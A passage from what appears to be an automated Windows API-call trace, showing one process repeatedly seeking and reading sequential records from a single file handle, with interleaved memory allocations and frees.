liDistanceToMove=0x28e2c, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=167468) returned 1 [0113.847] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x115, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x115, lpOverlapped=0x0) returned 1 [0113.848] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.848] malloc (_Size=0x3d) returned 0x12ef2cf0 [0113.849] free (_Block=0x12ed3840) [0113.849] free (_Block=0x12ef2d40) [0113.850] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28f51, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=167761) returned 1 [0113.850] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.850] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28fab, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=167851) returned 1 [0113.851] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x126, lpOverlapped=0x0) returned 1 [0113.851] malloc (_Size=0x48) returned 0x12ef2d40 [0113.851] malloc (_Size=0x3d) returned 0x12ef2fc0 [0113.852] free (_Block=0x12ef2cf0) [0113.852] free (_Block=0x12ed3fc0) [0113.853] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x290e1, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=168161) returned 1 [0113.854] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.854] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2913b, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=168251) returned 1 [0113.854] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x126, lpOverlapped=0x0) returned 1 [0113.855] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.855] malloc (_Size=0x2c) returned 0x12ef43d0 [0113.855] free (_Block=0x12ef2fc0) [0113.855] free (_Block=0x12ef2d40) [0113.857] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x29271, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=168561) returned 1 [0113.857] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.857] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x292ba, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=168634) returned 1 [0113.857] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0xb42, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0xb42, lpOverlapped=0x0) returned 1 [0113.858] malloc (_Size=0x48) returned 0x12ef2d40 [0113.858] malloc (_Size=0x3d) returned 0x12ef2fc0 [0113.859] free (_Block=0x12ef43d0) [0113.859] free (_Block=0x12ef2cf0) [0113.860] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x29e0c, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=171532) returned 1 [0113.860] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.860] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x29e66, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=171622) returned 1 [0113.860] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x125, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x125, lpOverlapped=0x0) returned 1 [0113.861] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.861] malloc (_Size=0x3d) returned 0x12ed3840 [0113.862] free (_Block=0x12ef2fc0) [0113.862] free (_Block=0x12ef2d40) [0113.863] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x29f9b, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=171931) returned 1 [0113.863] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.864] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x29ff5, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=172021) returned 1 [0113.864] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x149, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x149, lpOverlapped=0x0) returned 1 [0113.865] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.865] malloc (_Size=0x41) returned 0x12ef2fc0 [0113.865] free (_Block=0x12ed3840) [0113.865] free (_Block=0x12ef2cf0) [0113.867] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2a14e, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=172366) returned 1 [0113.867] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.867] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2a1ac, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=172460) returned 1 [0113.867] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x117, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x117, lpOverlapped=0x0) returned 1 [0113.870] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.870] malloc (_Size=0x3d) returned 0x12ef2d40 [0113.871] free (_Block=0x12ef2fc0) [0113.871] free (_Block=0x12ed3fc0) [0113.873] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2a2d3, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=172755) returned 1 [0113.874] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.874] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2a32d, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=172845) returned 1 [0113.874] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x14b, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x14b, lpOverlapped=0x0) returned 1 [0113.875] malloc (_Size=0x48) returned 0x12ed3840 [0113.875] malloc (_Size=0x47) returned 0x12ed3fc0 [0113.875] free (_Block=0x12ef2d40) [0113.876] free (_Block=0x12ef2cf0) [0113.877] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2a488, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=173192) returned 1 [0113.877] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.877] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2a4ec, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=173292) returned 1 [0113.877] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x59a, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x59a, lpOverlapped=0x0) returned 1 [0113.879] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.879] malloc (_Size=0x29) returned 0x12ef43d0 [0113.879] free (_Block=0x12ed3fc0) [0113.879] free (_Block=0x12ed3840) [0113.883] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2aa96, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=174742) returned 1 [0113.883] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.883] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2aadc, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=174812) returned 1 [0113.883] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x1da0, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x1da0, lpOverlapped=0x0) returned 1 [0113.888] malloc (_Size=0x48) returned 0x12ef2d40 [0113.888] malloc (_Size=0x29) returned 0x12ef4410 [0113.888] free (_Block=0x12ef43d0) [0113.889] free (_Block=0x12ef2cf0) [0113.891] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2c88c, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=182412) returned 1 [0113.891] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.892] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2c8d2, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=182482) returned 1 [0113.892] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x8f0, lpOverlapped=0x0) returned 1 [0113.893] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.893] malloc (_Size=0x2c) returned 0x12ef43d0 [0113.894] free (_Block=0x12ef4410) [0113.894] free (_Block=0x12ef2d40) [0113.896] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2d1d2, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=184786) returned 1 [0113.896] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.896] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2d21b, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=184859) returned 1 [0113.896] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x6ce, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x6ce, lpOverlapped=0x0) returned 1 [0113.897] malloc (_Size=0x48) returned 0x12ef2d40 [0113.897] malloc (_Size=0x38) returned 0x12ef4410 [0113.897] free (_Block=0x12ef43d0) [0113.898] free (_Block=0x12ef2cf0) [0113.901] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2d8f9, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=186617) returned 1 [0113.901] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.901] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2d94e, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=186702) returned 1 [0113.901] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x133, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x133, lpOverlapped=0x0) returned 1 [0113.902] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.902] malloc (_Size=0x27) returned 0x12ef14a0 [0113.903] free (_Block=0x12ef4410) [0113.903] free (_Block=0x12ef2d40) [0113.905] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2da91, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=187025) returned 1 [0113.905] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.905] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2dad5, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=187093) returned 1 [0113.905] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x1a44, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x1a44, lpOverlapped=0x0) returned 1 [0113.907] malloc (_Size=0x48) returned 0x12ef2d40 [0113.907] malloc (_Size=0x48) returned 0x12ed3840 [0113.908] free (_Block=0x12ef14a0) [0113.908] free (_Block=0x12ef2cf0) [0113.909] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2f529, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=193833) returned 1 [0113.910] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.910] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2f58e, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=193934) returned 1 [0113.910] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x118, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x118, lpOverlapped=0x0) returned 1 [0113.911] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.911] malloc (_Size=0x30) returned 0x12ef43d0 [0113.911] free (_Block=0x12ed3840) [0113.911] free (_Block=0x12ef2d40) [0113.913] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2f6b6, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=194230) returned 1 [0113.913] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.913] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2f703, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=194307) returned 1 [0113.913] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x1d7, lpOverlapped=0x0) returned 1 [0113.914] malloc (_Size=0x48) returned 0x12ed3840 [0113.914] malloc (_Size=0x24) returned 0x12ef15c0 [0113.915] free (_Block=0x12ef43d0) [0113.916] free (_Block=0x12ed3fc0) [0113.921] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2f8ea, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=194794) returned 1 [0113.921] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.921] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2f92b, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=194859) returned 1 [0113.921] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x58e, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x58e, lpOverlapped=0x0) returned 1 [0113.923] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.923] malloc (_Size=0x27) returned 0x12ef1380 [0113.923] free (_Block=0x12ef15c0) [0113.924] free (_Block=0x12ed3840) [0114.021] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2fec9, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=196297) returned 1 [0114.021] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0114.021] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2ff0d, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=196365) returned 1 [0114.022] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x2000, lpOverlapped=0x0) returned 1 [0114.024] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x31f0d, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=204557) returned 1 [0114.024] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce30, nNumberOfBytesToRead=0x5b2, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x208ce30*, lpNumberOfBytesRead=0x208ccf0*=0x5b2, lpOverlapped=0x0) returned 1 [0114.026] malloc (_Size=0x48) returned 0x12ed3840 [0114.026] malloc (_Size=0x33) returned 0x12ef43d0 [0114.026] free (_Block=0x12ef1380) [0114.027] free (_Block=0x12ed3fc0) [0114.051] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x324cf, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=206031) returned 1 [0114.051] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.051] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3251f, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=206111) returned 1 [0114.051] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xe1, lpOverlapped=0x0) returned 1 [0114.053] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.053] malloc (_Size=0x41) returned 0x12ef2cf0 [0114.054] free (_Block=0x12ef43d0) [0114.054] free (_Block=0x12ed3840) [0114.059] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32610, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=206352) returned 1 [0114.059] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.059] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3266e, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=206446) returned 1 [0114.059] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x135, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x135, lpOverlapped=0x0) returned 1 [0114.061] malloc (_Size=0x48) returned 0x12ef2d40 [0114.061] malloc (_Size=0x43) returned 0x1228ed20 [0114.062] free (_Block=0x12ef2cf0) [0114.062] free (_Block=0x12ed3fc0) [0114.063] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x327b3, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=206771) returned 1 [0114.063] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.063] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32813, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=206867) returned 1 [0114.063] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x138, lpOverlapped=0x0) returned 1 [0114.066] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.066] malloc (_Size=0x34) returned 0x12ef43d0 [0114.066] free (_Block=0x1228ed20) [0114.067] free (_Block=0x12ef2d40) [0114.069] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3295b, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=207195) returned 1 [0114.069] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.069] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x329ac, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=207276) returned 1 [0114.069] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0xdf, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0xdf, lpOverlapped=0x0) returned 1 [0114.071] malloc (_Size=0x48) returned 0x12ed3840 [0114.071] malloc (_Size=0x2e) returned 0x12ef4410 [0114.072] free (_Block=0x12ef43d0) [0114.072] free (_Block=0x12ed3fc0) [0114.073] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32a9b, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=207515) returned 1 [0114.074] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.074] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32ae6, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=207590) returned 1 [0114.074] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x392, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x392, lpOverlapped=0x0) returned 1 [0114.075] malloc (_Size=0x48) returned 0x12ed3fc0 [0114.075] malloc (_Size=0x31) returned 0x12ef4450 [0114.076] free (_Block=0x12ef4410) [0114.076] free (_Block=0x12ed3840) [0114.078] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32e88, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=208520) returned 1 [0114.078] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.078] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32ed6, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=208598) returned 1 [0114.078] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ced0, nNumberOfBytesToRead=0x313, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x208ced0*, lpNumberOfBytesRead=0x208cd90*=0x313, lpOverlapped=0x0) returned 1 [0114.081] malloc (_Size=0x48) returned 0x12ed3840 [0114.081] malloc (_Size=0x32) returned 0x12ef43d0 [0114.082] free (_Block=0x12ef4450) [0114.082] free (_Block=0x12ed3fc0) [0114.084] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x331f9, lpNewFilePointer=0x208cd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd60*=209401) returned 1 [0114.084] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd30, lpOverlapped=0x0 | out: lpBuffer=0x208cdb0*, lpNumberOfBytesRead=0x208cd30*=0x1e, lpOverlapped=0x0) returned 1 [0114.084] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x33248, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=209480) returned 1 [0114.084] ReadFile (in: hFile=0x2d0, 